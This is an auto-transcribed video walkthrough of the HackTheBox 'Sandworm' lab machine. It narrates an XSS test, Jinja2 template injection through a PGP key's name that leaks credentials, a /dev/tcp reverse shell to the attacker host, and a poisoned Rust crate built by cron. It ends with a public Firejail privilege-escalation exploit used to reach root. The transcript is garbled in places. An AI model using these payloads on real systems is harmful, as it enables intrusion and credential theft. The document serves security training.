HackTheBox - Sandworm
Key Takeaways
The video demonstrates a cybersecurity challenge, HackTheBox - Sandworm, where the speaker uses various tools such as Nmap, GPG, and Python to exploit vulnerabilities and gain access to a system. The challenge involves using PGP encryption, XSS testing, and server-side template injection to ultimately gain membership in the Jailer group.
Full Transcript
what's going on YouTube this is IP I'm doing sandw from hack the box which the website has a tipline you can send messages over to the earners as long as this pgp encrypted since not many people know how to do pgp encryption it offers a getting started guide where you can test out decrypting encrypting and signing messages when you sign a message there's actually a ssti vulnerability it displays back who signed it and there you can inject variables into it you can dump the config it doesn't really get you that much but since it's Ginger 2 you can get code execution and land a shell on the server you're in a fire fire jail so you can't do that much if you examine the configs you get a password to another user and then you discover there's a Cron job that is running a um cargo build periodically so you can inject a dependency get code execution as another user and then there's a fire jail exploit at the end so with all that being said let's just jump in as always I'm going to start off with the end map so- C for default scripts SV enumerate versions OA output all formats put in the nend map directory and call it sandworm then the IP address of 1010 112118 this can take some time to run so I've already ran it looking at the results we have three ports open the first one being SSH on Port 22 and its Banner tells us it's an auntu server we also have HTTP on Port 80 it's Banner tells us it's engine X also running on ubun 2 and it's directing us over to the SSA htb domain so let's go ahead and add this to our host file so pseudo VI host and then we can add 10 10 11 212 or 218 and then SSA HTP and then the final Port we have engine X listing on 443 this is https it's also Ubuntu we have information about the certificate and the title of the page so let's just go to take a look at the website so I'm going to go to 1010 112118 and it'll direct us over to the ss. htb we could view the certificate if we wanted to and look at like common names to see if there's any other subdomains so looking at here I don't see anything else we do have an email address of Atlas ss. htb so it looks like it is leaking potentially a username unless Atlas is somewhere on the page and this is like the right so doesn't look like it so I'm guessing that is a user we have the site powered by flask so we know this is python so if I did any like dur bustering or things like that I wouldn't do things like add.php uh we have a link here that says experience SSA that's going to the about page and this is just like a lot of text so doesn't look too interesting if we go over to contact it's a way to submit tips and they want all tips to be pgp encrypted so if I just send anything here it's going to say message is not pgp encrypted if we don't know how to use pgp we can check out their guide which doesn't actually tell us how to really use it I guess it points us to using like programs like g k gpg Cleopatra open pgp um and then we have their signature here and it has what key ID they are and again we have Atlas at ss. htb down here so that is who owns this key at the top of the page it has their public key so we can just copy this and then I'm going to VSS a.ub we can add their public key here and this will let us encrypt messages to them so let's go back to the contact form and whenever I see like contact forms I like testing for cross a scripting so what I'm going to do is put a payload here that if it is vulnerable to cross a scripting it'll reach back out to my box so I'm just going to call this message and we'll do a image source is equal to http 10148 and then SL a okay so now we definitely want to listen on Port 80 so if anyone connects back to us we will know so now the step is to um encrypt this message so I'm going to import their public key uh directory keybox is it D- import there we go it is D- import so we can see their key ID SSA does that match what their key ID was maybe this uh let's see guide yes it does so we have their key ID there we could do gpg D- list- keys and we can see their key is indeed in our public key ring so to encrypt a message we're going to do a gpg then D- encrypt and we can specify message and we also want to do recipient uh recipient and it's going to be Atlas ss. htb and I'm also going to do- o space Dash and that's going to be [Music] um output to standard out and when I do that we get a bunch of junk so the best way to do this is what uh gpg or pgp calls armor and it's essentially going to be um just base 64 with this little header right so now if I paste this message and let's see the contact it says thank you for your submission so we know it was a valid pgp thing because we didn't get that error message saying it could not be decrypted or whatever it said so we just kind of wait for them to hit back on a web server and while we're waiting let's check out their guide to see what else is happening right so it looks like we can encrypt messages so encrypt a message with oh the public key and pasted here this is exactly what we did so we can see it comes back here this isn't vulnerable to cross a scripting since herb browser did not reach back to us um this one is provide our pgp key and they'll encrypt a message to us so let's create a pgp key to do that I'm going to do a D- full d generate key uh let's do RSA and RSA default key size let's have it valid forever to set it not to expire probably shouldn't do that um our name we'll say ipac root atp. roxs comment we'll call this test key do o for okay and then let's assign a password to it I'm just putting password there it tells me it's bad I'm going to say go ahead and use it so now we have created a key so if I do gpg d-list Keys we can see my key is here as well so let's do a gpg Das Dash what are we doing um sending them an encrypted message okay so let's do uh D- armor then I want to say say we do is it local user local user to sign or decrypt so sign is that let's see oh all we need to do is provide a key we're not encrypting a message so let's do das Das list keys and we can say gpg D- export we'll give it this key and we need to specify armor and then I'll do xclip the selection to clipboard so that just copied this to my clipboard so now I can paste this here and they gave us a encrypted message with a public key so we want to decrypt this so I'm going to do VI um encrypted pgp we'll paste this in and then we can do gpg uh what is it probably decrypt yep uh and then the file let's do encrypted pgp and I'm going to specify - o dash so output goes to standard out we'll put our password in and we see the message so let's now go try the next thing which is going to be verify a signature so we have to sign a message to them so let's just sign um or message right we just have this so let's sign the message we'll do gpg D- clear sign and I'm going to do DH we want local user uh we can just do dasu and then the key gpg d-list Keys specify this I probably could have said ipsec or something so we have that and then we can specify the file and a file we wanted to en Crypt or sign sign was just message and if we look we have a message. ASC file and that is going to be our assigned message we could also if we wanted to um just do A- o dash and that output straight to standard out then we could say xclip uh selection clipboard if we didn't want to highlight it so if we paste this here then we need to get our public key that we signed it with so so let's go back to our export and we do verify signature we can see it's saying the message is signed valid um we see ipac right there and then test key if we put something bad here let's just try this wonder what's going to happen it's not valid base 64 so actually let me try one thing can put that there okay and then what is theirs xclip selection clipboard I'm just going to try putting their key here and then sign and I'm guessing uh if the signature is not valid it just says it's not properly formatted I was hoping to get like some type of error but doesn't look like we do so the next thing I want to test for is um checking if we got any hits on cross a scripting we didn't so I'm guessing it's not V with cross a scripting but it is outputting information from our key here and we know the website is ginger so if this is like using a Ginger 2 template to get all this output maybe there's a server side template injection right so let's test for that to do that we can do a gpg uh full generate key to make a new key uh all the defaults sure yep and then a name I'm just going to put um a ssti payload that I know off the top my head and all that's going to do if it's vulnerable but from ssti is dump the config of the server and that's going to be like the environment variables so we can save that we'll do a super secret password of password again say yep that is what we want and we have the key 6 e29 so let's go back to the clear sign and we're going to sign it with that key and we can export that key and then when we verify the signature we see where the username was it's now dumping the config and right off the bat we have my SQL creds right here so SQL Alchemy database URL MySQL Atlas garlic and onion z42 so let's try SSH Atlas ss. htb paste in the password it doesn't work make sure we copied it right we did so I'm just going to take note of it so we can say my SQL Atlas garlic and onion whatever the secret key so we could sign cookies if we wanted to uh looks like it dumped it twice actually not sure exactly why but we don't really have anything else that's important here so let's try a different payload I'm going to go to hack trick and then we can say um ssti Ginger 2 and let's find a payload that will get us rce so Ginger 2 ssti it's going to load I guess while that loads we can create what we want so we'll do payload b-i Dev TCP 10 10 148 9,10 and 1 so Ginger 2 and we're looking for one with rce just going to search for p open I think this will probably work I think that's bypassing a Sandbox just going to go to the top typ P [Music] open okay let's just try this so let's go ssti let's see so it's just doing a poop LS here and we want to get our reverse shell there so I'm going to um cat payload we'll do a b 64- w0 and we can just copy this and where LS is we can say um Echo what do we do Dash down or not does it matter doesn't look it matters we can just do Echo That Base 64 Bas 64- D and then pipe it over to bash okay let's cat ssti we can grab this I'm just going to glance at my payload Lo once more that does look good so we create a new gpg key yep all the defaults we'll do that for the name okay a super secret password copy or key we can export the key let's go back here paste that in then we have to sign so we can copy this paste it in verify signature and it's hung and we did have a oh we don't have a listener on 90001 let's start one up and click verify signature wonder if we have to refresh the page let's try this again NC lvmp 901 that is the signature that is the export it's definitely hung we're not getting a shell uh let's do cat ssti we can just copy and paste this for good measure so the reverse shell works but our payload does not let's see is there any other poin there we go I think this is the one I want I was confused because the other payload did not start with a um double slash and that's not what I was used to saying maybe I wasn't on Ginger 2 there this whole page is ginger to I don't know let's try this one uh let's go down here highlight put clean this up okay so now we have to create a new key this is annoying yep real name copy this payload okay put our password then we have this key oh I was signing the message yeah that's fine it doesn't matter what I assigned never mind I was think I need to assign the ssti payload but the actual ssti is inner script right or inner signature so we got that let's go to export and I'm hitting alt D and it just deletes the word so it deleted everything at once so I didn't have to hold delete NC lvmp 901 verify signature and there we go we got a shell so I'm not sure why the other payload didn't work but oh well um with the shell I guess we can get a proper PTY I don't know exactly what this is doing uh we got an error message but uh import PTY PTY spawn b bash then SS stty raw minus Echo FG enter enter and then we can also export term is equal to X term so we can clear the screen so let's see uh if we do SS lntp um not found netstat ANP not found um so we don't have anything to look at open ports I want to try to connect to mySQL um we don't have like any MySQL client so that's odd here is the source code to the application um doesn't really buy us much because we already dumped the config that had the credentials so if I went to slpr we can go like look at one if I cat CMD line it tells us we're in a jail so this is the output of the very first P I was thinking we're in a jail because just we don't have a lot of um um commands I've never really not been able to net Stat or um what is it SS there's probably like a net and then we could potentially get open ports from here uh cat TCP yeah this would be able to get us certain ports but I don't exactly remember how this is filtered and of course we don't have less- S so I think this would be 1271 on Hex Port of 1388 can we easily see that uh does Python 3 we do uh no that's not what I want to do I want to unhex it is there unhex nope uh what if we just do Hex like that there we go 5,000 so that shows it is listing on 5,000 so we could try this one this is probably going to be 3306 it is so this is definitely listening on my SQL um I guess we could try uploading chisel to see if we can just talk to the SQL database I did not actually do that when solving this box but I don't know if we can with him the jail so let's try it out so I'm going to copy chisel here and then we can stand up a web server and we can W get 10 1048 8,000 chisel we don't have WG we don't have curl don't have touch and it's read only file system so that's not actually going to help us really um because we won't be able to get chisel on the box I wonder if Dev have shm can we even write here we could so I guess we could potentially get chisel on the box uh let's see NC lvmp 91 let's pipe chisel to it and then can I remember how to do this well cat Dev TCP 101048 91 out to Chisel going to give it a second to finish that copy of course we probably don't have md5 sum so we can't identify if it worked but looks like it's there uh let's make it executable we don't have ch mod that is annoying so we can't do do chisel right yeah I'm not exactly sure how to make that executable to get this working uh do we have umk we do I wonder if umk 0000 if that actually works uh we don't have touch and no that does not make it executable um do we have copy because we could just copy like bin bash here and then move files to it nope we don't um so I'm not sure how to get this executed I guess if we really wanted to we could probably like find a python proxy and run that but uh let's see what else is on the box so if we go to our home directory there is a cargo directory there's also a do config if we go in do config we have file Jail jail and HTTP Pi or I think that's HTTP I don't know how to pronounce that let's go in sessions Local Host po there is an admin. Json file see what exactly this is but we do have another credential um silent Observer quiet like the wind so let us look at this something to help with apis no idea so let us just SSH to the Box let's try SSH silent Observer ss. htb paste in this password and we get logged in so now let's do a cat on creds and see if we can s you to Atlas because maybe like Atlas is prohibited from logging in Via um SSH and that's why it was blocked but it looks like that's still doesn't work we can do MySQL so let's do Atlas DP past in the password show databases use SSA show tables select star from users and we have some Shaw 256 ashes um one for Odin I'm guessing that's not going to crack fast see do I have the Kracken up I do so let's go over to hashcat vhes SL SSA I'll call this put in that passwordhash cat opt word list Rock q and it does not match let's see hashcat example hashes okay let's grab this and search and I don't think it's going to be true Crypt probably not Cisco could be Django but I don't think so because this is flask it's probably going to be this format so let's copy what this looks like then we can V hashes SSA paste this in and go through the format so it doesn't want that header um then this is the iteration count and that doesn't use dollar signs as separators it uses colons I'm guessing if we pasted um let's see B hashes SSA or that won't even bother I was betting J would just natively decrypt this it's probably like a John format not hashcat but we've already modified it so let's do hash cat. bin hashes SSA opt wordlist Rock you. text and let's see if it starts cracking looks like it is and it's going to take potentially 15 minutes so while that goes I'm going to uh go back to my terminal and let's see what else is there if we go up one directory we can go in Atlas and it looks like we can view his home directory so let's see the config if we do find. config that is the fire jail stuff that we saw before and HTTP uh there is a cargo directory it was in our directory as well do LS on cargo uh go and registry there is this cash d. tag if I look at the date on the system it's the same day I believe it's weird that this is in military time this is p.m this is just 2 minutes ago so something is happening with cargo on this box so if I do lsla again we can see 2350 if I do stat on this we can see it was changed and modified access date is June 6 but we keep modifying this so it looks like cargo is being ran on this system so I'm going to run peace bu let's see do we have PE bu on box uh let's see LS opt or we can do find opt grap PE bu I don't think I do so let's do GitHub peace bu and download it we could also like run Lin peas and change it so it's in um not in fast mode but I'm just going to do PE bu on this [Music] one W get python 3-m HTTP server let's do W get 10 10 148 8,000 P spy was it 64 there we go let's make it executable and then we can run it and it looked like it was running every two minutes so let's see the date oh shoot I probably just missed it let's see we see fire jail that is my reverse shell and let's see there is a cleanup script it's making this tip net um set uid which is odd we should take a look at this binary uh let's see sh Atlas at 10 10 11 uh 218 I think the IP was silent Observer oh um silent server copy the right password and we can see Peace by went off but that is just [Music] um because I logged in through SSH if I run date we have about probably a minute left until we think the cargo is going to go off what was it CD opt tipet uh where is it Target debug tip net this is set uid so I'm not exactly sure what that is and looking at this so we had the cleanup we have cargo running and let's see it's going to go into this directory switch over to the atlas user and run cargo so cargo is um rust like package manager so it's kind of like the PIP equivalent of rust if we go in up tipet we can look at the cargo toml let's see and this is going to be all the things it installs let go go up one directory go to crates and logger actually can we find anything writable here let's hide all error messages and we can't write to any files here we can write to files in creates logger so if we modify this source code and have this function probably um send us a shell whenever it does a log it'll also send us a shell and if it's set u ID maybe we'll get lucky and it'll send us a root shell or maybe just a shell as that Atlas user um let's see what was that permission of tipet find dot- name tipet uh Target there we go so it is set u ID but only running uh owned by Atlas so it won't let us switch over to root um it would have to be owned by root there but we can get on the atlas user this way so let's go into logger source and let's see rust run command so we're going to use this library and then do command new so V oh there must be a Chron um clearing that file or reverting that file so what I'm going to do is CP Li RS to Dev shm we will edit it here and then copy it to that directory so we can add that command and then add this a set paste there we go so it's executing sh- C and we can say Echo see we have the ssti payload still we do let's just copy this paste and then it looks like we need to put a semicolon here we copied a little bit too much it's probably because what we copied was in like an if then statement this is checking if it's windows or Linux and we copied that we definitely don't want that so that looks good so let's copy lib RS to opt crates logger source and then we want to make sure we listen on 90001 because because that's where a shell is going to go and it looks like it'll probably happen in about 90 seconds so let's do a sleep 70 and I will resume when that's done or hash cut has finished it didn't crack anything so now we're just waiting for the sleep to finish the Sleep has finished if I do a date we have about 10 seconds left until we hopefully get our shell so in seconds the cargo should start building we can probably do a psf grab cargo now and we see cargo was running and we got a shell so now we are finally the atlas user so let's do python 3-c import PTY PTY spawn b bash and then sty raw minus Echo FG and then export term is equal to X term so so we can clear the screen so now that with the atlas user we want to see exactly what this gets us so the quickest way is just do like a find sl- user Atlas and then hide error messages Let's see we own ver dubdub duub uh this is probably going to be all the pgp messages that we sent so I guess it may be possible if we looked at all the messages that we can decrypt someone else's message with gpg and my terminal screwed up when I hit home my cursor is just moving out um it'll be easiest if we just do SSH and then let's just create a key cat at list. Pub and we can move this over to authorized Keys s-i Atlas Atlas at 10 10 11 uh I think it's 218 but we can just use sa. HTP and there we go so where was that message verd duub HTML SSA SSA uh submissions there we go so let's do a gpg DD to decrypt this message it's encrypted with key ID c6d gpg d-list Keys we do not have that key I don't think we do not um gp-r gpg see it's using the keys in gnupg so that's the key ring we have this is the password for it so that's probably something we should save V cs. text gpg PW there we go um let's go back to submissions there is a log and these are old I wonder if this is from when people were testing the box or may put by the Creator yeah these are all old files maybe we can decrypt the other one nope so these look like they're encrypted with other people's Keys we can view the ones that are in asky uh selling iOS day see what is this one this is our um attempt at xss then this some weird message so this isn't anything um we could just try a su with this password not that easy do we have any pseudo rules we need atlas's password which we still don't have Let's see we are a member of the Jailer group I don't know what that is so let's do a Bine sl- group Jailer to Devol and Jailer can execute fire jail let's see that is a set uid binary I believe so let's see it is fire jail 0968 is there any vulnerabilities here grab this local rout I am pretty sure we've done this one before see is this the exploit ah here we go fire jooin dopy so let's go here CP download fire join pi. B what that is a python script I don't know why it gave it the bin extension maybe it's just a quirk of that mailing list it's weird let's see that's not SSH here we go so Dev shm let's W get 10 10 148 8,000 fire jail. it's not what I called it fire join Python 3 fire join. py uh we need executable bit and it says we can run fire jail djin in another terminal so let's SS H again 10 10 11 uh 218 and we run this exploit see what's it say m thing one oh it says we can yep we can so there we go and if we look at route. text we can get it so that is the Box hope you guys enjoyed it take care and I'll will see you all next time
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:10 - Finding their public key, then sending an encrypted message that contains a XSS Test payload
06:50 - Creating a PGP Key and sending our public key, so they can send an encrypted message back
08:40 - Decrypting the message they sent to us
09:50 - Signing a message, but not encrypting it for them to verify and see they give us the metadata back
12:40 - Testing a SSTI Payload in the username of the key, and seeing it will dump the config
15:25 - Finding a SSTI Payload with Jinja2 that gives code execution... First attempt fails
19:23 - Testing a different SSTI Payload and getting code execution
21:40 - Reverse shell returned, discovering we are in a jail, attempting to get chisel up and running and failing
26:55 - Finding admin.json which contains another credential and we can use this to SSH into the box
28:00 - Logging into MySQL and attempting to crack the hashes
31:00 - Identifying that a file in the cargo directory for atlas is being updated every 2 minutes. Running pspy to identify what is happening
35:55 - We can write to one of the libraries cargo using to build, putting a reverse shell in
43:50 - Identifying that Atlas can run Firejail as root, finding a exploit for Firejail and getting root
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related Reads
Chapters (15)
Introduction
1:00
Start of nmap
3:10
Finding their public key, then sending an encrypted message that contains a XS
6:50
Creating a PGP Key and sending our public key, so they can send an encrypted m
8:40
Decrypting the message they sent to us
9:50
Signing a message, but not encrypting it for them to verify and see they give
12:40
Testing a SSTI Payload in the username of the key, and seeing it will dump the
15:25
Finding a SSTI Payload with Jinja2 that gives code execution... First attempt
19:23
Testing a different SSTI Payload and getting code execution
21:40
Reverse shell returned, discovering we are in a jail, attempting to get chisel
26:55
Finding admin.json which contains another credential and we can use this to SS
28:00
Logging into MySQL and attempting to crack the hashes
31:00
Identifying that a file in the cargo directory for atlas is being updated ever
35:55
We can write to one of the libraries cargo using to build, putting a reverse s
43:50
Identifying that Atlas can run Firejail as root, finding a exploit for Firejai
🎓
Tutor Explanation
DeepCamp AI